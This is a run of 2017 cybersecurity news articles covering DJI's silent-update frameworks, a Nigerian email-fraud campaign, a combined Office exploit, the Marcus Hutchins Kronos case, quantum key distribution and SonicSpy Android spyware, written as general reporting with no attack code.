STE WILLIAMS

Updated Chinese drone firm DJI appears to have baked a hot-patching framework into its Go app that breaks Apple’s App Store terms and conditions, according to drone hacker sources.

The patching framework in question, JSPatch, appears to be baked into the iOS version of Go. Earlier this year Apple ejected a handful of JSPatch-using apps from the App Store.

China Daily said at the time that over 45,000 apps had been booted due to “hot-patching” concerns.

JSPatch, along with similar hot-patching frameworks such as Rollout.io, fell foul of Apple because it allows substantial changes to be made to apps without triggering a review from Apple. Such reviews are mandatory for all new apps and updates to existing apps.

Anything that gets around review processes, regardless of motivation, raises questions about security. A year ago El Reg warned that JSPatch “had inadvertently spawned a serious security risk for iOS app users“.

A similar framework called Tinker is baked into the Android version of DJI Go, according to sources familiar with the two apps. Both Tinker and JSPatch allow silent updates which could use existing permissions in new ways not previously disclosed to the user.

The support person for DJI in the US commented in another thread about JSPatch that they “have been told both Android and iOS will have this functionality removed in the next release”.

We have asked Apple for comment and will update if and when we hear back.

Earlier this month the US Army ordered all of its formations to stop using DJI products, including drones and apps, citing unspecified “cyber vulnerabilities”.

It is not difficult to draw a line between the remote update facilities uncovered by users cracking into DJI’s software and the US Army’s decision, though at the time the American military declined to reveal further details and DJI’s public position was that it had no idea what upset the Pentagon.

DJI representatives did not respond to our request to explain the JSPatch/Tinker situation, having said only that they needed to talk to the company’s “overseas technical team” first. DJI is a Chinese firm, though it has extensive consumer-facing operations in the West.

However, the company did announce it is launching a “local data mode” that “stops internet traffic to and from its flight control apps”. This, DJI said in a statement, “will stop [apps] sending or receiving any data over the internet, giving customers enhanced assurances about the privacy of data generated during their flights.”

Local data mode appears to be similar to enabling flight mode on a mobile phone: the firm says its use will block all updates to maps, geofencing information, new flight restrictions and other software updates.

This is a clear response to the US Army ban on all DJI equipment, presumably in the hope that stopping the drones and their associated apps phoning home to China (pictures and videos can be synced with DJI’s Flickr-style drone photo-sharing website) will soothe the US military’s concerns.

We have asked the US Army if it will restart use of DJI products following this announcement and will update this article if we hear back from them.

British police forces are making increasing use of drones as cheap alternatives to full-blown helicopters. The Devon and Cornwall, Dorset, and Norfolk forces have all used DJI products in trials, with DC deciding to build its drone unit around DJI Inspire 1 quadcopters. That these aircraft rely on apps which could have been silently tweaked to allow a third party access to live surveillance data gathered by police is undesirable, to say the least. ®

Update

DJI corp comms director Adam Lisberg got in touch with us after publication to say: “DJI will release new versions of the DJI GO apps by the end of August with the code in question removed.”

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/08/15/dji_go_app_jspatch_tinker_silent_update_no_review/

A seemingly state-sponsored cyberattack aimed at more than 4,000 infrastructure companies has been blamed on a lone Nigerian cybercriminal.

The campaign started in April 2017, and has targeted some of the largest international organisations in the oil, gas, manufacturing, banking and construction industries. The global scale of the campaign and the organisations marked suggest an expert gang or state-sponsored agency is behind it.

Security researchers at Check Point have blamed the APT-style attack on a single Nigerian national in his mid-20s, living near the country’s capital, Abuja. The crook is using fraudulent emails which appear to originate from oil and gas giant Saudi Aramco, the world’s second largest daily oil producer, targeting financial staff within companies in attempts to trick them into revealing company bank details, or open the email’s malware-infected attachment.

The miscreant used NetWire, a remote-access trojan which allows full control over infected machines, and Hawkeye, a key-logging program. The campaign has resulted in 14 successful infections, earning the criminal thousands of dollars through a class of fraud commonly known as business email compromise.

Maya Horowitz, threat intelligence group manager for Check Point, said: “Even though this individual is using low-quality phishing emails, and generic malware which is easy to find online, his campaign has still been able to infect several organisations and target thousands more worldwide. It shows just how easy it is for a relatively unskilled hacker to launch a large-scale campaign that successfully breaches the defences of even large companies, enabling them to commit fraud.

“This emphasises the need for organisations to improve their security to protect against phishing or business email compromise scams, and to educate employees to be cautious about opening emails, even from companies or individuals that they recognise.”

Since uncovering the campaign and establishing its origins, Check Point’s research team has shared its findings to law enforcement authorities both in Nigeria and internationally.

Business email compromise attacks have increased dramatically over the past 18 months. The FBI reported a 270 per cent rise in victims since the start of 2016. Victims lose $50,000 on average. This class of fraud is estimated to have cost organisations globally over $3bn from 2013 to 2016.

Bootnote

On his Facebook account, the crook uses the motto “get rich or die trying”, referencing the song by rapper 50 Cent.

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/08/15/nigerian_fraud_kingpin/

A new Microsoft Office attack is doing the rounds that combines two previously known exploits.

Security firm Cisco Talos believes that this could be a precursor or test of a new method intended to avoid detection.

The attack, which aims to execute remote code within Microsoft Office, combines CVE-2017-0199 (one of the most common vulnerabilities exploited by malicious documents distributed in spamming campaigns) and CVE-2012-0158.

Talos reckons that the hackers used the combination to avoid Word displaying a prompt that may raise the end user’s suspicions. Another possibility is that they attempted to avoid security defences which may be triggering the combination of OLE2Link in a Word document and the download of an HTA file.

The attack was unsuccessful, indicating “poor testing or quality control procedures”, Talos said. However, this does show a level of experimentation by crooks seeking to use CVE-2017-0199 as a means to launch additional weaponised file types and avoid user prompts.

“This attack may have been an experiment that didn’t quite work out, or it may be indication of future attacks yet to materialise,” Cisco Talos warns.

El Reg invited Microsoft to respond and we’ll update this story as and when we hear back. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/08/15/combo_office_exploits_attack/

The US Defense Intelligence Agency has vowed to capture enemy malware, study and customize it, and then turn the software nasties on their creators.

Speaking at the US Department of Defense Intelligence Information Systems (DoDIIS) conference in Missouri on Monday, the head of the agency Lieutenant General Vincent Stewart told attendees that the US was tired of just taking hits from outside players, can so it was planning to strike back.

“Once we’ve isolated malware, I want to reengineer it and prep to use it against the same adversary who sought to use against us,” he said. “We must disrupt to exist.”

Speaking in front of a cheesy animated world map of simulated cyber-attacks, built by defunct security biz Norse, Stewart said that the traditional stance of the US has been defensive: intrusions would be detected, and infections would be cleaned up. But this would change, he said.

There are a few worries to spring to mind: one is that miscreants, whether state-backed hackers or independent crews, typically use networks and other infrastructure shared with innocent folks: from email to web hosts to ISPs. Malware commandeered by Uncle Sam and launched back at the bad guys could knock out important civilian systems.

Also, attribution is difficult at the best of times – in other words, it’s tricky to be sure who exactly is behind a truly sophisticated attack – so the malware may be flung in the face of a party that had nothing to do with the original assault. A Trojan built by a teenager in a São Paulo bedroom could be incorrectly pinned on Iranian or Russian or Venezuelan government spies, leading to all sorts of awkward conversations at the embassy.

While the DIA employs a very high standard of hacker, flinging repurposed malware at enemies is, to us, a high-risk maneuver. The chances of a server in, say, Uzbekistan getting fried because some other state-sponsored hacker was using it to attack America are very high.

This is also somewhat outside of the DIA’s remit. Online warfare is best handled by the NSA and US Cyber Command, which really do have the best hackers on the US taxpayers’ payroll. Then again, the DIA does have something of a reputation for wanting more digital responsibilities. ®

PS: The DIA said it used Norse’s map because the conference was (U) unclassified, and thus a pretty animated map was the best it had to hand without leaking classified material.

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/08/15/us_government_wants_to_reverseengineer_malware_to_fight_back/

The US and French presidential elections were both highly spirited and targeted by the Russian intelligence active measures teams with the goals to influence, disrupt and sow distrust. To listen to the ongoing discussion in media and government, one would think that post-election, the Russian intelligence apparatus had picked up its kitbag and headed back to its lair to noodle how best to revisit the pitch just prior to the next election.

The reality is, they’ve not left the pitch and are still engaged, every day, influencing and planting seeds of distrust. The German Marshall Fund of the United States has provided a grant to facilitate the creation of the Alliance for Securing Democracy, a bipartisan, transatlantic initiative. In early August, the alliance launched Hamilton 68, an online dashboard that measures …

… the content and themes being promoted by Russian influencers online, including attributed sources such as RT (Russia Today) and Sputnik, as well as Twitter accounts that are involved in promoting Russian influence and disinformation goals.

The Hamilton 68 dashboard tracks Russian propaganda within Twitter looking at the content and behavior of more than 600 accounts being used to push the Russian message. Some are bots, while others are state-funded news outlets, or semi-automated accounts that “tweet based on pre-determined rules supplemented by a human user”.  The monitored accounts fall into three categories:

• Attributed accounts that clearly state they are pro-Russian or affiliated with the Russian government.
• Accounts (including both bots and humans) that are run by troll factories in Russia and elsewhere.
• Accounts run by people around the world who amplify pro-Russian themes either knowingly or unknowingly, after being influenced by the efforts described above.

The dashboard is named after Alexander Hamilton’s Federalist Paper no. 68, which is both clever and apropos: the Federalist 68 focused on the “desire in foreign powers to gain an improper ascendant in our councils”. Hamilton demonstrated a good deal of prescience as to what was in store for the fledgling democracy in 1788 when he wrote these words. No one could have imagined the successful influence and disruption these past 18 months at the hands of the Russian intelligence apparatus.

The dashboard provides a near real-time look at Russian online efforts. Readers will find displayed a variety of widget boxes:

• Top Themes – a narrative that highlights the one or two top themes being propagated throughout the Russian network.
• Top Tweets – the top Tweets from within the network as measured during the preceding 24 hours.
• Bots and Trolls metrics – metrics presented in bar graph format are provided for, top hashtags, trending hashtags, trending topics, top topics, top domains, trending domains, top URLs, trending URLs, distribution of tweets by hour of day, daily tweet counts and distribution of tweets by day of the week.

Hamilton 68 has unsurprisingly caught the attention of the Kremlin. Indeed, recently departed Russian ambassador to the United States, Sergei Kislyak, attributed the creation of the tool to Washington and not a pro-democracy non-profit.

The creators go to great length to emphasize that not every tweet, retweet, or item that finds its way into the network is created by a Russian author, or is germane to the US democratic process. Interspersed with these items seemingly innocuous pieces one will find the propaganda, that which some have come to call fake news. The alliance concludes its introduction to Hamilton 68 with:

We are not telling you what to think, but we believe you should know when someone is trying to manipulate you. What you do with that information is up to you.

While Hamilton 68 dashboard is focused on the United States, we should note the October 2016 EU strategic communication to counteract propaganda against it by third parties, which warned all EU members about active measures to undermine democracy. The alliance acknowledges that a dashboard could be made for a number of topics beyond the US – France, Germany, Syria conflict, and Russia’s conflict with Ukraine to name a few.

Check out the dashboard, provide the creators your feedback and suggestions.

Follow @NakedSecurity
Follow @burgessct

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/JrQoHHc3pmc/

Your daily round-up of some of the other stories in the news

Smart locks bricked by update lock out Airbnb guests

When is a smart lock not such a smart idea after all? When a firmware update bricks two popular models widely used by Airbnb hosts to provide access without the need for pesky actual keys, that’s when.

Lockstate’s LS6i is the model recommended by Airbnb for hosts: the accommodation platform company offers a $50 discount to would-be purchasers via its Host Assist programme. So it didn’t go down well with hosts when a firmware update pushed out last week caused what Lockstate told its customers was a “fatal error” with the LS6i and LS6000i locks.

Lockstate said on Twitter that 500 locks had been been affected by the update – and customers were warned that it would take up to 18 days for a full replacement. Or if users prefer, they can remove the back panel and send that to Lockstate for manual updating, which will take about a week.

We’ve got our doubts about smart locks – this isn’t the first time they’ve caused problems for users. If you need to let folk into your home, for now it might be best to stick to an old-fashioned physical key.

Hutchins pleads not guilty to Kronos charges

Marcus Hutchins, the security researcher arrested in Las Vegas as he prepared to fly home to the UK after Def Con, has pleaded not guilty in a Milwaukee court to charges that he created and distributed the Kronos banking trojan.

Hutchins, 23, who uses the handle @MalwareTechBlog on Twitter and who is best known for stopping the WannaCry ransomware outbreak in its tracks, has been allowed by the court to live and work in Los Angeles for his employer, according to The Register.

He has also had his bail conditions relaxed so that he can now get online: the only restriction on his access now is that he’s not allowed to visit the WannaCry server domain. He’s also had to surrender his passport and remain in the US.

His lawyer, Brian Klein of Baker Marquart, said: “We are very pleased today that the court modified his terms allowing him to return to his important work.”

Photographer lands drone on warship

There have been plenty of warnings about how drones compromise the privacy of individuals and threaten aircraft, and now there’s concern about naval security after an amateur photographer managed to land a drone on a British aircraft carrier docked in Scotland.

The drone’s owner, a member of an amateur photography group, was using his craft to capture video and stills of the 70,000-tonne Queen Elizabeth, the Royal Navy’s newest warship and the biggest ever built for the fleet.

The owner told the BBC that he hadn’t wanted to land on the ship but that the drone was sending warnings about high winds and so let it land on the ship, which he said was “like a ghost ship”.

He told the BBC that he took a photograph then managed to fly the drone back to his location, and then reported himself to the shipyard’s armed guards. “I thought I would be hauled in and have my footage confiscated. I could have been anybody. I guess they weren’t really bothered because the ship isn’t active yet.”

The Ministry of Defence told the BBC: “We take the security of HMS Queen Elizabeth very seriously. This incident has been reported to Police Scotland, an investigation is under way and we stepped up our security measures in light of it.”

Catch up with all of today’s stories on Naked Security

Follow @NakedSecurity
Follow @katebevan

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/bDEZzsv5MeM/

Marcus Hutchins, the WannaCry ransomware killer and now suspected malware developer, was told by a Las Vegas court on Friday he can be released on bail. He also denied any wrongdoing.

The British citizen was sensationally arrested and taken into custody on Wednesday by the FBI. The agents swooped as he was about to board a flight back home to the UK from America after attending the DEF CON hacking conference in Nevada last week. The Feds have accused him of creating, developing, and selling the Kronos banking malware from 2014 to 2015 with an unnamed associate.

On Thursday, he appeared in court for a five-minute hearing, and the case was adjourned for a day to give him more time with his lawyers. On Friday, at 3pm Pacific Time, he appeared before a judge, and indicated he will plead not guilty to the charges against him. He was told he could be released on bail under certain conditions with a $30,000 bond.

However, even though that hearing finished at 3.30pm, Hutchins and his lawyers weren’t able to get to the bail office in time as it closes at 4pm. Thus, he will not be released today – and will spend the weekend behind bars as the office will not reopen until Monday. He’s also due to be flown to Wisconsin for his next court appearance on Tuesday.

“He’s dedicated his life to researching malware and not trying to harm people,” said one of his attorneys, Adrian Lobo. “Using the internet for good is what he’s done.”

Lobo also told journalists Hutchins was able to raise bail money from his supporters, and that his family are still in the UK. We understand the Brit has still not been able to speak to his friends or relatives.

Prior to the hearing, Hutchins filed a motion to allow him to appear in court without wearing full shackles. It’s a measure of how paranoid the US court system is that a 23-year-old computer expert with no violent past could be shackled hand and foot for an administrative hearing. As it was, he appeared in a yellow jumpsuit and orange Crocs.

US Department of Justice prosecutors cited Hutchins’ recent trip to a gun range as proof that he should be denied bail and kept in jail, we’re told. Lobo said the government’s argument was “garbage.”

Crucially, prosecutors are also claiming that Hutchins admitted during interrogation, in which he did not have a lawyer, to writing malware, and allege the Brit hinted he also sold software nasties. That sounds bad, however bear in mind that Hutchins, who goes by MalwareTechBlog on Twitter, has written and shared malware code online for research purposes.

In April 2014, well before Kronos hit, Hutchins, who works as an antivirus researcher, published a blog post titled: “Coding Malware for Fun and Not for Profit (Because that would be illegal).” In it he explained how to write a bootkit for years-old Windows XP, and took steps to make sure it was next to useless.

“Before you get on the phone to your friendly neighborhood FBI agent, I’d like to make clear a few things: The bootkit is written as a proof of concept, it would be very difficult to weaponize, and there is no weaponized version to fall into the hands of criminals,” he blogged at the time.

And in 2015, Hutchins revealed on Twitter his shock at finding some other code he wrote being used within malware – Kronos, to be exact.

2015-01-08 MWT posted hooking codehttps://t.co/dilxdGobZE

2015-02-06 new Kronos posted online

2015-02-07 this tweet-https://t.co/dgg1H3cgrU

— Nate ╯彡┻━┻ (@natesantos) August 4, 2017

Hutchins’ lawyers say he is not in any way behind the Kronos Trojan, which silently infects Windows PCs to siphon off funds from victims’ online banking accounts. It is typically sold to crooks, who spread it in emails and malicious downloads and then pocket the stolen loot. It is based loosely on the Zeus Trojan, and was announced on Russian-language hacker forums in July 2014.

When free, whenever that will be, Hutchins will have to wear a GPS tag at all times, can’t use the internet, and can have no contact with his unnamed accused co-conspirator. He’s also confined to the US for the time being. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/08/04/marcus_hutchins_wannacry_kronos_court_bail/

Marcus Hutchins, the WannaCry kill-switch hero, has today pleaded not guilty to charges of creating and selling malware at a hearing in Milwaukee, Wisconsin.

The court took the unusual step of relaxing the the 23-year-old’s bail terms, allowing him to access the internet and work again. He will also be able to live in Los Angeles, where his employer is based. Hutchins is, however, obliged to surrender his passport and will be required to wear a tracking device until his trial, which has been scheduled for October.

“Marcus Hutchins is a brilliant young man and a hero,” said Marcia Hofmann, founder of Zeigeist Law, outside the court house. “He is going to vigorously defend himself against these charges and when the evidence comes to light we are confident that he will be fully vindicated.”

The change in bail conditions is interesting. Usually computer crime suspects are instructed to stay offline completely, but the only restrictions on Hutchins is that he can’t visit the Wannacry server domain.

Hutchins became the toast of the infosec world when his actions helped limit the spread of the WannaCry ransomware, which affected NHS hospitals and numerous other organisations worldwide in May.

Hutchins attended the Black Hat and DEF CON conferences in Las Vegas earlier this month only to be arrested before boarding his flight back home to the UK.

US authorities allege he created Kronos, a banking trojan. Hutchins’ lawyers previously indicated he intended to deny charges during an earlier bail hearing.

“We are very pleased today that the court modified his terms to allow him to return to his important work,” said his lawyer Brian Klein, partner at Baker Marquart LLP.

Hutchins faces six charges related to the development and distribution of Kronos. A second, unnamed defendant features on the same rap sheet. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/08/14/hutchins_court_plea/

News sites love a tech story mentioning that spooky word “quantum”, and if you can add a bit of space travel then you’ve probably hit a sweet spot.

It was no surprise, then, that the June announcement by a Chinese team that it had generated “entangled” photon pairs on board the Micius satellite which were separated and sent to cities 1,200km apart on the ground, got attention.

The team followed up this week with a practical demonstration in which entanglement was harnessed to send encryption keys from the same satellite to the ground using a security technology called Quantum Key Distribution (QKD).

QKD, really a complex set of protocols based on quantum physics, has been a thriving field for years, so what is new here?

Headline writers got carried away with the idea that what the Chinese have built is some kind of “unhackable” communications system which, of course, is utter nonsense – though actually, it’s far more interesting than that.

QKD is about entangling photons or electrons, which are then used to secure a channel distributing encryption keys. Any attempt to interfere with or “measure” one of these particles alters the state of the other, which is revealed by a statistically high “error” rate.

Notice that QKD doesn’t stop the channel being from being hackable, it’s simply that this can’t be hidden from the parties using it. You’re probably wondering, then, why QKD isn’t everywhere. The answer is a mixture of tricky physics and engineering limitations.

Once you’ve entangled electrons or photons it isn’t easy to keep them in that state. Even when you do, pairs can be rare enough that data rates end up being very low and distances short.

Despite attempts to make QKD simpler to implement, it remains a lab-bound technology needing trained physicists to get it working. This raises costs, as does the need to send photons through fibre cables in a point-to-point fashion.

You can read a summary of QKD’s larger engineering limitations in a short paper published by Britain’s NCSC last year but suffice to say that any weakness in the equipment used to set up and verify the sending and receiving of keys can create theoretical security vulnerabilities.

One achievement of the Chinese experiment was to dodge the need for fibre cables by transmitting photons using lasers on Micius through the perfect medium of the atmosphere.

But even if it could be made to work perfectly, new problems arise. Imagine a scenario in a future world where QKD is widely used. In the event that surveillance of a channel is detected, how do the two communicating partners react?

Logically, they stop using the channel and move to another, but what if the same thing happens again? If they can keep this up, the attacker has pulled off a simple denial-of-service attack.

A way of countering that would be to build QKD networks large and distributed enough to resist the DoS scenario. The Chinese experiment, based on fleets of satellites, shows this might be feasible.

There is now talk of a large-scale global QKD system. This remains far-fetched, as does the idea of a “quantum internet”. As far as we know, QKD has not even been used to confirm a real-world hack, although it’s not impossible as militaries have been testing the technology for a while.

QKD, and China’s satellite experiments, will doubtless prove their worth one day, in some form. Until that day, expect more silly headlines that present well-established quantum principles as if they were the opening to Alice’s rabbit hole.

Follow @NakedSecurity
Follow @JohnEDunn

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/hBqPS0bUHe4/

Thanks to Chen Yu, Rowland Yu and Ferenc László Nagy of SophosLabs for their behind-the-scenes work.

Android users have a new threat to be aware of: spyware apps that steal data from the devices they infect. Some samples made their way to Google Play, but the vast majority is coming from other online sources.

Researchers from SophosLabs and elsewhere have found three cases of SonicSpy-infused apps in Google Play: Soniac, Hulk Messenger, and Troy Chat – messaging apps that hide their spying functionality and await orders from command-and-control servers.

Google booted the apps from its store after they were discovered. Researcher Chen Yu said the Google Play versions had “tiny installation numbers and existed for a very short time”. Though three were found on Google Play, SophosLabs has counted 3,240 SonicSpy apps in the wild. Some reports place the number at 4,000.

According to multiple reports, a single bad actor – probably based in Iraq – has released these apps into the wild since February.

How it operates

The various SonicSpy-infused apps share the ability to:

• Silently record audio
• Take photos with the device’s camera
• Make outbound calls
• Send text messages to whatever phone numbers the attacker chooses
• Retrieve data from contacts, Wi-Fi hotspots and call logs

On the devices it infects, SonicSpy removes its launch icon to hide itself. It then connects to a control server on port 2222 of arshad93.ddns[.]net, according to Michael Flossman, a researcher from Lookout who first reported the spyware’s appearance.

Defensive measures

Sophos customers are protected from the SonicSpy apps, which are detected as Andr/HiddenAp-W, Andr/Axent-CY, Andr/FakeApp-BK and Andr/Xgen-Y.

The continued presence of malicious Android apps demonstrates the need to use an Android antivirus such as our free Sophos Mobile Security for Android.

By blocking the install of malicious and unwanted apps, even if they come from Google Play, you can spare yourself lots of trouble.

In the bigger picture, the average Android user isn’t going to know what techniques the malware used to reach their device’s doorstep, but they can do much to keep it from getting in – especially when it comes to the apps they choose. To that end, here’s some more general advice:

• Stick to Google Play. It isn’t perfect, but Google does put plenty of effort into preventing malware arriving in the first place, or purging it from the Play Store if it shows up. In contrast, many alternative markets are little more than a free-for-all where app creators can upload anything they want, and frequently do.
• Avoid apps with a low reputation. If no one knows anything about a new app yet, don’t install it on a work phone, because your IT department won’t thank you if something goes wrong.
• Patch early, patch often. When buying a new phone model, check the vendor’s attitude to updates and the speed that patches arrive. Why not put “faster, more effective patching” on your list of desirable features, alongside or ahead of hardware advances such as “better camera” and “higher-res screen”?
• Follow @NakedSecurity
  Follow @BillBrenner70

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/qWUpmKNH8F8/